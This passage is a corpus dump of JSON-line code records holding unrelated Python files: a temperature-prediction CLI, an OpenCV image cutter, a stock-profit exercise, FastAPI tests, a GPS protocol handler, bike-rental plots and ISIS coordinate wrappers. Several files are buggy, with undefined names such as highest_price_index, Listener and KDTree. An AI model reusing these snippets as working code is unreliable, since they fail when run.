break\n\n except ValueError:\n print(\"Incorrect input! Please enter a month number!\")\n continue\n\n while True:\n try:\n day = int(input(\"Please select a day (format: dd)\\n\"))\n\n if day not in range(1, 32):\n print(\"Incorrect input! Please enter a day number in 'dd' format between(1-31)\")\n continue\n if day in range(1, 32):\n break\n\n except ValueError:\n print(\"Incorrect input! 
Please enter a day number!\")\n            continue\n\n    make_prediction(model=model, month=month, day=day)\n\n\nif __name__ == '__main__':\n    ask(clf)\n","sub_path":"temp_prediction_terminal.py","file_name":"temp_prediction_terminal.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"630452056","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport pdb\nimport config\nimport os\n\ndef cutImg(img_path, img_name):\n    # img_path = './samplepic/sample1.jpg' # image path\n    img = cv2.imread(img_path)\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n    # Edge detection with the Sobel operator\n    detected_edges = cv2.Sobel(img, cv2.CV_64F, 0, 1)\n\n    # Binarize the edge image\n    m,n,l = detected_edges.shape\n    matrixedges = np.zeros((m,n))\n\n    matrixedges = np.sum(detected_edges, axis=2)\n    matrixedges[matrixedges < 500] = 0\n    matrixedges[matrixedges >= 500] = 255 \n\n    # Save the edge image\n    # cv2.imwrite('matrixedges.png', matrixedges)\n\n    # Count the highlighted pixels per row, split the rows into 15 groups, and find each group's maximum and its position\n    lineLightSum = np.sum(matrixedges,axis=1)//255\n    lightSet = np.zeros((15, 2))\n    for i in range(15):\n        lightSet[i, 0] = np.argmax(lineLightSum[i*len(lineLightSum)//15:(i+1)*len(lineLightSum)//15]) + i*len(lineLightSum)//15\n        lightSet[i, 1] = np.max(lineLightSum[i*len(lineLightSum)//15:(i+1)*len(lineLightSum)//15])\n\n    # Filter out candidates using the mean and the distances between them\n    mean = np.mean(lightSet[:, 1])\n    lightSet = lightSet[lightSet[:, 1] > mean/2]\n    i = 0\n    while i < len(lightSet) - 1:\n        if lightSet[i + 1, 0] - lightSet[i, 0] <= m/15:\n            deleteIndex = np.argmin(lightSet[i:i+2, 1])\n            lightSet = np.delete(lightSet, i+deleteIndex, axis=0)\n        else:\n            i += 1\n\n    # Save the cropped strips\n    lightSet = np.delete(lightSet, 1 ,axis=1)\n    if lightSet[0] > 200:\n        lightSet = np.insert(lightSet, 0, 0, axis=0)\n    if lightSet[-1] < m - 200:\n        lightSet = np.append(lightSet, m-1)\n\n    for index in range(1, len(lightSet)):\n        tempimagename = os.path.join(\n            config.IMAGE_AFTER_PROCESS_DIR, img_name[:img_name.find('.jpg')] + str(index) + '.jpg')\n        cv2.imwrite(tempimagename, img[int(lightSet[index - 1]):int(lightSet[index])])\n    \n    return len(lightSet) - 1\n    ","sub_path":"BackEnd/cutImg.py","file_name":"cutImg.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"192033441","text":"#!/usr/bin/python\n\nimport argparse\n\n\ndef find_max_profit(prices):\n    # First attempt - naive approach\n    # First find a low price to buy at\n    # lowest_price_index = 0\n    # for current_index in range(1, len(prices) - 1):\n    #     if prices[current_index] < prices[lowest_price_index]:\n    #         lowest_price_index = current_index\n    #\n    # # Next find a high price (that comes later) to sell at\n    # highest_following_price_index = 0\n    # for current_index in range(lowest_price_index, len(prices) - 1):\n    #     if prices[current_index] > prices[highest_following_price_index]:\n    #         highest_following_price_index = current_index\n    #\n    # # Find the difference of the prices to find the profit\n    # profit = prices[highest_following_price_index] - prices[lowest_price_index]\n    # return profit\n\n    # Second attempt - Brute force\n    # best_profit = 0\n    # for i in range(0, len(prices) - 1):\n    #     for j in range(i, len(prices) - 1):\n    #         if prices[j] - prices[i] > best_profit:\n    #             best_profit = prices[j] - prices[i]\n    # if best_profit == 0:\n    #     return -10\n    # return best_profit\n\n    # Third attempt - single pass: track the lowest price seen so far\n    lowest_price_index = 0\n    best_profit = prices[1] - 
prices[lowest_price_index]\n\n for i in range(1, len(prices) - 1):\n if prices[i] < prices[lowest_price_index]:\n lowest_price_index = i\n if prices[i] > prices[highest_price_index]:\n highest_price_index = i\n if highest_price_index > lowest_price_index:\n profit = prices[highest_price_index] - prices[lowest_price_index]\n return profit\n else:\n highest_price_index = lowest_price_index\n for i in range(lowest_price_index + 1, len(prices)):\n if prices[i] > prices[highest_price_index]:\n highest_price_index = i\n return profit\n\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(\n profit=find_max_profit(args.integers), prices=args.integers))\n","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240166452","text":"# pylint: disable=no-self-use\n# - pylint test classes must pass self, even if unused.\n# pylint: disable=invalid-name\n# - this module has some pretty verbose names,\n# shrinking them feels worse than disabling this lint.\n# pylint: disable=logging-fstring-interpolation\n# - honestly just annoying to use lazy(%) interpolation.\n\"\"\"\nEndpoint tests for registering events.\n\"\"\"\nimport logging\nfrom typing import Dict, Any\n\nfrom fastapi.testclient import TestClient\nfrom requests.models import Response as HTTPResponse\n\nfrom app import app\nimport models.events as event_models\n\nclient = TestClient(app)\n\n\ndef check_event_registration_response_valid(response: HTTPResponse) -> bool:\n \"\"\"\n Returns the boolean status of the validity of the raw\n http server response.\n \"\"\"\n try:\n assert response.status_code == 201\n assert response.json()\n return True\n except AssertionError as assert_error:\n debug_msg = f\"failed at: {assert_error}. 
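stock_prices.py walks through three attempts at the max-profit problem, ending in a fairly tangled index-tracking version. The standard single-pass formulation tracks the cheapest price seen so far and is much easier to verify; note this sketch returns 0 on monotonically falling prices rather than the brute-force attempt's -10 sentinel:

```python
def max_profit(prices):
    """Classic buy-low/sell-later scan: O(n) time, O(1) space."""
    if len(prices) < 2:
        return 0
    min_price = prices[0]
    best = 0
    for price in prices[1:]:
        best = max(best, price - min_price)  # sell today at best buy so far
        min_price = min(min_price, price)    # update best buy for later days
    return best

assert max_profit([7, 1, 5, 3, 6, 4]) == 5  # buy at 1, sell at 6
assert max_profit([9, 7, 4, 1]) == 0        # prices only fall
```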
resp json: {response.json()}\"\n logging.debug(debug_msg)\n return False\n\n\ndef get_reg_event_endpoint_url_str() -> str:\n \"\"\"\n Returns the endpoint url string\n \"\"\"\n return \"/events/register\"\n\n\ndef get_json_from_event_reg_form(\n event_form: event_models.EventRegistrationForm) -> Dict[str, Any]:\n \"\"\"\n Creates and returns a valid json payload from an event registration form\n \"\"\"\n json_dict = event_form.dict()\n return json_dict\n\n\ndef get_invalid_json_from_reg_form(\n event_form: event_models.EventRegistrationForm) -> Dict[str, Any]:\n \"\"\"\n Takes a valid event form object and returns an invalid json payload from it\n \"\"\"\n event_dict = event_form.dict()\n # make data dirty by reversing the order of values with their keys\n values = list(event_dict.values())[::-1]\n for key, value in zip(event_dict.keys(), values):\n event_dict[key] = value\n return event_dict\n\n\nclass TestRegisterEvent:\n def test_register_event_success(\n self, event_registration_form: event_models.EventRegistrationForm):\n \"\"\"\n Attempts to register a valid event, expecting success.\n \"\"\"\n event_form_json = get_json_from_event_reg_form(event_registration_form)\n\n endpoint_url = get_reg_event_endpoint_url_str()\n event_response = client.post(endpoint_url, json=event_form_json)\n assert check_event_registration_response_valid(event_response)\n\n def test_register_event_no_data_failure(self):\n \"\"\"\n Tries to register an event while sending no data,\n expecting failure.\n \"\"\"\n empty_event_form = {}\n\n endpoint_url = get_reg_event_endpoint_url_str()\n event_response = client.post(endpoint_url, json=empty_event_form)\n\n assert not check_event_registration_response_valid(event_response)\n assert event_response.status_code == 422\n\n def test_register_event_bad_data_failure(\n self, event_registration_form: event_models.EventRegistrationForm):\n \"\"\"\n Tries to register an event with a faulty piece of data,\n expecting a 422 failure.\n \"\"\"\n invalid_event_json = get_invalid_json_from_reg_form(\n event_registration_form)\n\n endpoint_url = get_reg_event_endpoint_url_str()\n event_response = client.post(endpoint_url, json=invalid_event_json)\n\n assert not check_event_registration_response_valid(event_response)\n assert event_response.status_code == 422\n","sub_path":"tests/test_event_registration.py","file_name":"test_event_registration.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"355415026","text":"# -*- coding: utf8 -*-\n'''\n@project Maprox Observer \n@info Протокол AGIS-V1\n@copyright 2009-2011 © Maprox Ltd.\n@author sunsay \n@link $HeadURL: http://vcs.maprox.net/svn/observer/Server/trunk/lib/listeners/agis/v1.py $\n@version $Id: v1.py 404 2011-02-24 22:16:22Z sunsay $\n'''\n\nimport re\nfrom datetime import datetime\n\nfrom kernel.logger import log\nfrom kernel.config import conf\nfrom lib.handler import AbstractHandler\n\n# Регулярное выражение, которому должна соответствовать каждая\n# запись, переданная модемом нашему серверу\nregex = '^(\\d+)\\|(\\d{4})\\|' # идентификатор, код сообщения\nregex += '(\\d+\\.\\d+)\\|(N|S|W|E)\\|' # широта\nregex += '(\\d+\\.\\d+)\\|(N|S|W|E)\\|' # долгота\nregex += '(\\d+\\.\\d+)\\|(\\d+\\.\\d+)\\|' # скорость, азимут\nregex += '(\\d{6})\\|(\\d+\\.?\\d+)\\|' # дата, время посылки\n\nregexCoord = '(\\d{2,})(\\d{2}.\\d{2,})' # координаты протокола A-GIS v1\n\nclass Handler(AbstractHandler):\n 'AGIS. 
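test_event_registration.py exercises a FastAPI endpoint through `TestClient`, asserting 201 on success and 422 on validation failures. A self-contained analogue of that pattern, with an invented app and schema standing in for the record's `app` and `EventRegistrationForm` (assumes fastapi and its test dependencies are installed):

```python
from fastapi import FastAPI, status
from fastapi.testclient import TestClient
from pydantic import BaseModel

app = FastAPI()

class EventForm(BaseModel):  # illustrative stand-in schema
    name: str
    capacity: int

@app.post("/events/register", status_code=status.HTTP_201_CREATED)
def register(form: EventForm):
    return {"registered": form.name}

client = TestClient(app)

def test_register_ok():
    resp = client.post("/events/register",
                       json={"name": "demo", "capacity": 10})
    assert resp.status_code == 201 and resp.json()["registered"] == "demo"

def test_register_bad_payload():
    # pydantic validation failures surface as 422, as the record asserts
    assert client.post("/events/register", json={}).status_code == 422

test_register_ok()
test_register_bad_payload()
```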
v1'\n\n def __init__(self, store = None):\n 'Инициализация объекта. Создаем объект работы с хранилищем'\n Listener.__init__(self, store)\n\n def dispatch(self, clientThread):\n 'Обработка данных, поступивших от модема'\n Listener.dispatch(self, clientThread)\n data = clientThread.request.recv(conf.initDataCount)\n while len(data) > 0:\n matchObj = re.match(regex, data.decode());\n self.store(matchObj)\n data = clientThread.request.recv(4096)\n\n def coordCalc(self, coord, letter):\n mo = re.match(regexCoord, coord)\n result = str(int(mo.group(1)))\n result += str(float(mo.group(2)) / 60)[1:]\n if (letter.upper() == 'W' or letter.upper() == 'S'):\n result = '-' + result\n return result\n\n def store(self, matchObject):\n \"\"\"Сохранение обработанных данных в хранилище\"\"\"\n log.debug('%s::store()', self.__class__)\n try:\n mo = matchObject\n packet = dict()\n packet['uid'] = mo.group(1)\n packet['latitude'] = self.coordCalc(mo.group(3), mo.group(4))\n packet['longitude'] = self.coordCalc(mo.group(5), mo.group(6))\n packet['code'] = mo.group(2)\n packet['speed'] = mo.group(7)\n packet['azimuth'] = mo.group(8)\n # вычисляем время\n timeStr = matchObject.group(9) + ' ' + matchObject.group(10)\n dt = datetime.strptime(timeStr, '%d%m%y %H%M%S.%f')\n packet['time'] = dt.strftime('%Y-%m-%dT%H:%M:%S.%f')\n self.send([packet])\n # закрываем соединение\n except Exception as E:\n log.error(E)\n","sub_path":"server/china/lib/handlers/agis/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"425913252","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 1 14:43:09 2017\r\n\r\n@author: MainPc\r\n\"\"\"\r\n#import library\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sn\r\nimport numpy as np\r\nimport calendar\r\nfrom datetime import datetime\r\nfrom scipy import stats\r\n\r\n#read dataset\r\ntrain = pd.read_csv(\"c:/train.csv\")\r\ntest = pd.read_csv(\"c:/test.csv\")\r\n\r\n#dataset description\r\nprint(train.shape)\r\nprint(test.shape)\r\nprint(train.head(3))\r\n\r\ntrain.info()\r\ntest.info()\r\n\r\n#data sidtribution\r\nfig,ax1 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.boxplot(data=train,y=\"count\",orient=\"v\",ax=ax1)\r\nax1.set(ylabel='Number of Bike Rental (Hourly)',title=\"Count\")\r\n\r\n#remove outliers\r\nnewtrain = train[np.abs(train[\"count\"]-train[\"count\"].mean())<=(3*train[\"count\"].std())] \r\nprint (\"Shape Before Ouliers: \",train.shape)\r\nprint (\"Shape After Ouliers: \",newtrain.shape)\r\n\r\n#datetime decomposition\r\nnewtrain[\"date\"] = newtrain.datetime.apply(lambda x : x.split()[0])\r\nnewtrain[\"hour\"] = newtrain.datetime.apply(lambda x : x.split()[1].split(\":\")[0])\r\nnewtrain[\"weekday\"] = newtrain.date.apply(lambda dateString : calendar.day_name[datetime.strptime(dateString,\"%Y-%m-%d\").weekday()])\r\nnewtrain[\"month\"] = newtrain.date.apply(lambda dateString : calendar.month_name[datetime.strptime(dateString,\"%Y-%m-%d\").month])\r\nnewtrain = newtrain.drop([\"datetime\"],axis=1)\r\n\r\n#data visualization\r\nlists = ['hour', 'weekday', 'month']\r\nfor i, name in enumerate(lists):\r\n plt.subplot(3,1,i+1)\r\n sn.countplot(name,data=newtrain) \r\nplt.show()\r\n\r\nfig,ax2 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.barplot(data=newtrain,y=\"count\",x=\"hour\",orient=\"v\",ax=ax2)\r\nax2.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Hour\")\r\n\r\nfig,ax3 = 
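The AGIS handler's `coordCalc` converts NMEA-style `ddmm.mmmm` coordinates to signed decimal degrees by splitting with a regex and string-pasting the fractional part. The equivalent conversion written as plain arithmetic (function name is illustrative):

```python
def nmea_to_decimal(coord: str, hemisphere: str) -> float:
    """Convert 'ddmm.mmmm' to signed decimal degrees, matching coordCalc:
    the last two digits before the dot are minutes, the rest are whole
    degrees; S and W hemispheres negate the result."""
    value = float(coord)
    degrees = int(value // 100)
    minutes = value - degrees * 100
    decimal = degrees + minutes / 60
    if hemisphere.upper() in ("S", "W"):
        decimal = -decimal
    return decimal

print(nmea_to_decimal("5546.9500", "N"))   # 55.7825
print(nmea_to_decimal("03738.9700", "E"))  # 37.6495
```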
plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.barplot(data=newtrain,y=\"count\",x=\"weekday\",orient=\"v\",ax=ax3)\r\nax3.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Weekday\")\r\n\r\nfig,ax4 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.barplot(data=newtrain,y=\"count\",x=\"month\",orient=\"v\",ax=ax4)\r\nax4.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Month\")\r\n\r\nfig,ax5 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.countplot(newtrain['holiday'],ax=ax5)\r\nax5.set(xlabel='Holiday', ylabel='Count',title=\"Holiday\")\r\n\r\nfig,ax6 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.countplot(newtrain['workingday'],ax=ax6)\r\nax6.set(xlabel='Working Day', ylabel='Count',title=\"Working Day\")\r\n\r\nfig,ax7 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.barplot(data=newtrain,y=\"count\",x=\"workingday\",orient=\"v\",ax=ax7)\r\nax7.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Working Day\")\r\n\r\nfig,ax14 = plt.subplots()\r\nfig.set_size_inches(8,5)\r\nsn.boxplot(data=newtrain,y=\"count\",x=\"weather\",orient=\"v\",ax=ax14)\r\nax14.set(ylabel='Number of Bike Rental (Hourly) ',title=\"Weather\")\r\n\r\nfig,(ax8,ax9) = plt.subplots(nrows=2)\r\nfig.set_size_inches(8, 5)\r\nsn.countplot(newtrain['temp'],ax=ax8)\r\nax8.set( ylabel='Count',title=\"Temperature\")\r\nsn.regplot(x=\"temp\", y=\"count\", data=newtrain,ax=ax9)\r\n\r\nfig,(ax10,ax11) = plt.subplots(nrows=2)\r\nfig.set_size_inches(8, 5)\r\nsn.countplot(newtrain['atemp'],ax=ax10)\r\nax10.set( ylabel='Count',title=\"Apparent Temperature\")\r\nsn.regplot(x=\"atemp\", y=\"count\", data=newtrain,ax=ax11)\r\n\r\nfig,(ax11,ax12) = plt.subplots(nrows=2)\r\nfig.set_size_inches(8, 5)\r\nsn.countplot(newtrain['windspeed'],ax=ax11)\r\nax10.set( ylabel='Count',title=\"Windspeed\")\r\nsn.regplot(x=\"windspeed\", y=\"count\", data=newtrain,ax=ax12)\r\n\r\nfig,(ax12,ax13) = plt.subplots(nrows=2)\r\nfig.set_size_inches(8, 5)\r\nsn.countplot(newtrain['humidity'],ax=ax12)\r\nax12.set( ylabel='Count',title=\"Humidity\")\r\nsn.regplot(x=\"humidity\", y=\"count\", data=newtrain,ax=ax13)\r\n\r\ncorrelation = newtrain[[\"temp\",\"humidity\",\"windspeed\",\"casual\",\"registered\",\"count\"]].corr()\r\nmask = np.array(correlation)\r\nmask[np.tril_indices_from(mask)] = False\r\nfig,ax= plt.subplots()\r\nfig.set_size_inches(15,10)\r\nsn.heatmap(correlation, mask=mask,vmax=.8, square=True,annot=True)\r\n\r\nfig,ax15 = plt.subplots(ncols=2,nrows=2)\r\nfig.set_size_inches(15, 10)\r\nsn.distplot(train[\"count\"],ax=ax15[0][0])\r\nstats.probplot(train[\"count\"], dist='norm', fit=True, plot=ax15[0][1])\r\nsn.distplot(np.log(newtrain[\"count\"]),ax=ax15[1][0])\r\nstats.probplot(np.log1p(newtrain[\"count\"]), dist='norm', fit=True, plot=ax15[1][1])\r\n\r\nfig,month = plt.subplots()\r\nfig.set_size_inches(15,10)\r\nhourAggregated = pd.DataFrame(newtrain.groupby([\"hour\",\"month\"],sort=True)[\"count\"].mean()).reset_index()\r\nsn.pointplot(x=hourAggregated[\"hour\"], y=hourAggregated[\"count\"],hue=hourAggregated[\"month\"], data=hourAggregated, join=True,ax=month)\r\nmonth.set(xlabel='Hour Of The Day', ylabel='Number of Bike Rental',title=\"Nmumber Of Bike Rental By Hour Of The Day Across Month\",label='big')\r\n\r\nfig,weekday = plt.subplots()\r\nfig.set_size_inches(15,10)\r\nhueOrder = [\"Sunday\",\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\"]\r\nhourAggregated = 
pd.DataFrame(newtrain.groupby([\"hour\",\"weekday\"],sort=True)[\"count\"].mean()).reset_index()\r\nsn.pointplot(x=hourAggregated[\"hour\"], y=hourAggregated[\"count\"],hue=hourAggregated[\"weekday\"],hue_order=hueOrder, data=hourAggregated, join=True,ax=weekday)\r\nweekday.set(xlabel='Hour Of The Day', ylabel='Number of Bike Rental',title=\"Nmumber Of Bike Rental By Hour Of The Day Across Weekdays\",label='big')\r\n\r\nfig,user = plt.subplots()\r\nfig.set_size_inches(15,10)\r\nhourTransformed = pd.melt(newtrain[[\"hour\",\"casual\",\"registered\"]], id_vars=['hour'], value_vars=['casual', 'registered'])\r\nhourAggregated = pd.DataFrame(hourTransformed.groupby([\"hour\",\"variable\"],sort=True)[\"value\"].mean()).reset_index()\r\nsn.pointplot(x=hourAggregated[\"hour\"], y=hourAggregated[\"value\"],hue=hourAggregated[\"variable\"],hue_order=[\"casual\",\"registered\"], data=hourAggregated, join=True,ax=user)\r\nuser.set(xlabel='Hour Of The Day', ylabel='Number of Bike Rental',title=\"Nmumber Of Bike Rental By Hour Of The Day Across User Type\",label='big')\r\n\r\n#remove unnecessary features\r\ndataset = train.drop([\"datetime\", 'season', 'holiday', 'atemp' ,'windspeed', 'casual', 'registered', 'count'],axis=1)\r\nprint(dataset.dtypes)","sub_path":"Data Visualization.py","file_name":"Data Visualization.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"599435665","text":"\"\"\"This module contains wrappers around the ISIS campt and mappt that are\nspecific to understanding the relationship between pixels and projected\ncoordinates.\"\"\"\n\n# This is free and unencumbered software released into the public domain.\n#\n# The authors of autocnet do not claim copyright on the contents of this file.\n# For more details about the LICENSE terms and the AUTHORS, you will\n# find files of those names at the top level of this repository.\n#\n# SPDX-License-Identifier: CC0-1.0\n\nimport os\nfrom collections import abc\nfrom numbers import Number\n\nimport numpy as np\n\ntry:\n import kalasiris as isis\nexcept Exception as exception:\n from autocnet.utils.utils import FailedImport\n isis = FailedImport(exception)\n\nimport pvl\n\nisis2np_types = {\n \"UnsignedByte\" : \"uint8\",\n \"SignedWord\" : \"int16\",\n \"Double\" : \"float64\",\n \"Real\" : \"float32\"\n}\n\nnp2isis_types = {v: k for k, v in isis2np_types.items()}\n\n\ndef get_isis_special_pixels(arr):\n \"\"\"\n Returns coordinates of any ISIS no data pixels. Essentially, \n np.argwhere results of where pixels match ISIS special \n data types (NIRs, NHRs, HIS, HRS, NULLS).\n\n Parameters\n ----------\n arr : np.array \n Array to find special pixels in \n \n Returns\n -------\n : sp\n np.array of coordinates in y,x format containing special pixel coordinates\n\n \"\"\"\n isis_dtype = np2isis_types[str(arr.dtype)]\n sp_pixels = getattr(isis.specialpixels, isis_dtype)\n\n null = np.argwhere(arr==sp_pixels.Null)\n lrs = np.argwhere(arr==sp_pixels.Lrs)\n lis = np.argwhere(arr==sp_pixels.Lis)\n his = np.argwhere(arr==sp_pixels.His)\n hrs = np.argwhere(arr==sp_pixels.Hrs)\n sp = np.concatenate((null, lrs, lis, his, hrs))\n\n return sp\n\n\ndef get_nodata_bounds(arr):\n \"\"\"\n Get bounds for an image that does not contain any ISIS special pixels. 
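The repeated `hourAggregated` pattern in Data Visualization.py is a two-key groupby: mean rental count per (hour, month/weekday/user type), flattened with `reset_index` so seaborn's `pointplot` can draw one line per hue level. The aggregation step in isolation, on a toy frame standing in for `newtrain`:

```python
import pandas as pd

# toy stand-in: hourly rental counts tagged with weekday
df = pd.DataFrame({
    "hour":    [8, 8, 17, 17, 8, 17],
    "weekday": ["Monday", "Monday", "Monday", "Sunday", "Sunday", "Sunday"],
    "count":   [120, 140, 300, 80, 40, 90],
})

# same shape as the record's hourAggregated: mean count per (hour, weekday)
hour_agg = (
    df.groupby(["hour", "weekday"], sort=True)["count"]
      .mean()
      .reset_index()
)
print(hour_agg)
# seaborn then draws one line per weekday:
#   sn.pointplot(x="hour", y="count", hue="weekday", data=hour_agg)
```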
That is,\n ISIS Nulls, NIRS, NRS, HIS and HRS pixels\n\n Parameters\n ----------\n arr : np.array\n 2D array representing the image \n\n Returns\n -------\n : left_x \n left x coordinate of new bounds \n\n : right_x\n right x coordinate of new bounds \n \n : top_y\n top y coordinate of new bounds \n \n : bottom _y\n bottom y coordinates of new bounds \n \"\"\"\n sp = get_isis_special_pixels(arr)\n \n if not sp.any():\n return 0, arr.shape[1], 0, arr.shape[0]\n \n cy, cx = arr.shape[1]//2, arr.shape[0]//2\n tree = KDTree(sp, metric='euclidean')\n\n # For finding K neighbors of P1 with shape (1, 3)\n distances, indices = tree.query(np.array([cy, cx]).reshape(1,2), 1)\n \n # these are slightly misshapen by being in nested arrays (e.g. [[n]], [[y,x]])\n nearest_idx = indices.reshape(1,)\n neary, nearx = sp[nearest_idx].reshape(2,)\n\n # subtract 1 to exclude the special pixel\n x_dist = abs(cx - nearx) - 1\n y_dist = abs(cy - neary) - 1\n\n # left_x, right_x, top_y, bottom_y\n left_x = cx - x_dist\n right_x = cx + x_dist\n top_y = cy - y_dist\n bottom_y = cy + y_dist\n\n return left_x, right_x, top_y, bottom_y\n\n\ndef point_info(\n cube_path: os.PathLike,\n x,\n y,\n point_type: str,\n allowoutside=False\n):\n \"\"\"\n Returns a pvl.collections.MutableMappingSequence object or a\n Sequence of MutableMappingSequence objects which contain keys\n and values derived from the output of ISIS campt or mappt on\n the *cube_path*.\n\n If x and y are single numbers, then a single MutableMappingSequence\n object will be returned. If they are Sequences or Numpy arrays, then a\n Sequence of MutableMappingSequence objects will be returned,\n such that the first MutableMappingSequence object of the returned\n Sequence will correspond to the result of *x[0]* and *y[0]*,\n etc.\n\n Raises subprocess.CalledProcessError if campt or mappt have failures.\n May raise ValueError if campt completes, but reports errors.\n\n Parameters\n ----------\n cube_path : os.PathLike\n Path to the input cube.\n\n x : Number, Sequence of Numbers, or Numpy Array\n Point(s) in the x direction. Interpreted as either a sample\n or a longitude value determined by *point_type*.\n\n y : Number, Sequence of Numbers, or Numpy Array\n Point(s) in the y direction. Interpreted as either a line\n or a latitude value determined by *point_type*.\n\n point_type : str\n Options: {\"image\", \"ground\"}\n Pass \"image\" if x,y are in image space (sample, line) or\n \"ground\" if in ground space (longitude, latitude)\n\n allowoutside: bool\n Defaults to False, this parameter is passed to campt\n or mappt. 
Please read the ISIS documentation to\n learn more about this parameter.\n\n \"\"\"\n point_type = point_type.casefold()\n valid_types = {\"image\", \"ground\"}\n if point_type not in valid_types:\n raise ValueError(\n f'{point_type} is not a valid point type, valid types are '\n f'{valid_types}'\n )\n\n if isinstance(x, abc.Sequence) and isinstance(y, abc.Sequence):\n if len(x) != len(y):\n raise IndexError(\n f\"Sequences given to x and y must be of the same length.\"\n )\n x_coords = x\n y_coords = y\n elif isinstance(x, Number) and isinstance(y, Number):\n x_coords = [x, ]\n y_coords = [y, ]\n elif isinstance(x, np.ndarray) and isinstance(y, np.ndarray):\n if not all((x.ndim == 1, y.ndim == 1)):\n raise IndexError(\n f\"If they are numpy arrays, x and y must be one-dimensional, \"\n f\"they were: {x.ndim} and {y.ndim}\"\n )\n if x.shape != y.shape:\n raise IndexError(\n f\"Numpy arrays given to x and y must be of the same shape.\"\n )\n x_coords = x\n y_coords = y\n else:\n raise TypeError(\n f\"The values of x and y were neither Sequences nor individual \"\n f\"numbers, they were: {x} and {y}\"\n )\n\n results = []\n if pvl.load(cube_path).get(\"IsisCube\").get(\"Mapping\"):\n # We have a projected image, and must use mappt\n mappt_common_args = dict(allowoutside=allowoutside, type=point_type)\n\n for xx, yy in zip(x_coords, y_coords):\n mappt_args = {\n \"ground\": dict(\n longitude=xx,\n latitude=yy,\n coordsys=\"UNIVERSAL\"\n ),\n \"image\": dict(\n # Convert PLIO pixels to ISIS pixels\n sample=xx+0.5,\n line=yy+0.5\n )\n }\n for k in mappt_args.keys():\n mappt_args[k].update(mappt_common_args)\n mapres = pvl.loads(isis.mappt(cube_path, **mappt_args[point_type]).stdout)[\"Results\"]\n \n # convert from ISIS pixels to PLIO pixels\n mapres['Sample'] = mapres['Sample'] - 0.5\n mapres['Line'] = mapres['Line'] - 0.5\n\n results.append(mapres)\n else:\n # Not projected, use campt\n if point_type == \"ground\":\n # campt uses lat, lon for ground but sample, line for image.\n # So swap x,y for ground-to-image calls\n p_list = [f\"{lat}, {lon}\" for lon, lat in zip(x_coords, y_coords)]\n else:\n p_list = [\n f\"{samp+0.5}, {line+0.5}\" for samp, line in zip(x_coords, y_coords)\n ]\n\n # ISIS's campt needs points in a file\n with isis.fromlist.temp(p_list) as f:\n cp = isis.campt(\n cube_path,\n coordlist=f,\n allowoutside=allowoutside,\n usecoordlist=True,\n coordtype=point_type\n )\n\n camres = pvl.loads(cp.stdout)\n for r in camres.getall(\"GroundPoint\"):\n if r['Error'] is None:\n # convert all pixels to PLIO pixels from ISIS\n r[\"Sample\"] -= .5\n r[\"Line\"] -= .5\n results.append(r)\n else:\n raise ValueError(\n f\"ISIS campt completed, but reported an error: {r['Error']}\"\n )\n\n if isinstance(x, (abc.Sequence, np.ndarray)):\n return results\n else:\n return results[0]\n\n\ndef image_to_ground(\n cube_path: os.PathLike,\n sample,\n line,\n lontype=\"PositiveEast360Longitude\",\n lattype=\"PlanetocentricLatitude\",\n):\n \"\"\"\n Returns a two-tuple of numpy arrays or a two-tuple of floats, where\n the first element of the tuple is the longitude(s) and the second\n element are the latitude(s) that represent the coordinate(s) of the\n input *sample* and *line* in *cube_path*.\n\n If *sample* and *line* are single numbers, then the returned two-tuple\n will have single elements. 
If they are Sequences, then the returned\n two-tuple will contain numpy arrays.\n\n Raises the same exceptions as point_info().\n\n Parameters\n ----------\n cube_path : os.PathLike\n Path to the input cube.\n\n sample : Number or Sequence of Numbers\n Sample coordinate(s).\n\n line : Number or Sequence of Numbers\n Line coordinate(s).\n\n lontype: str\n Name of key to query in the campt or mappt return to get the returned\n longitudes. Defaults to \"PositiveEast360Longitude\", but other values\n are possible. Please see the campt or mappt documentation.\n\n lattype: str\n Name of key to query in the campt or mappt return to get the returned\n latitudes. Defaults to \"PlanetocentricLatitude\", but other values\n are possible. Please see the campt or mappt documentation.\n\n \"\"\"\n res = point_info(cube_path, sample, line, \"image\")\n\n if isinstance(sample, (abc.Sequence, np.ndarray)):\n lon_list = list()\n lat_list = list()\n for r in res:\n lon_list.append(_get_value(r[lontype]))\n lat_list.append(_get_value(r[lattype]))\n\n lons = np.asarray(lon_list)\n lats = np.asarray(lat_list)\n else:\n lons = _get_value(res[lontype])\n lats = _get_value(res[lattype])\n\n return lons, 